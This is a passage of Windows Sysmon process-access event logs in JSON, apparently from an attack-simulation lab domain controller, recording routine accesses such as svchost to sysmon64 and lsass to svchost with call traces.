07:58:51.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4416,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4417,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4418,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4419,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4420,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4421,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4422,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.329\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-001091620600}\r\nSourceProcessId: 1232\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-00108C7D0600}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.329","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-001091620600}","SourceProcessId":"1232","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-00108C7D0600}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4423,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.892\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.892","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
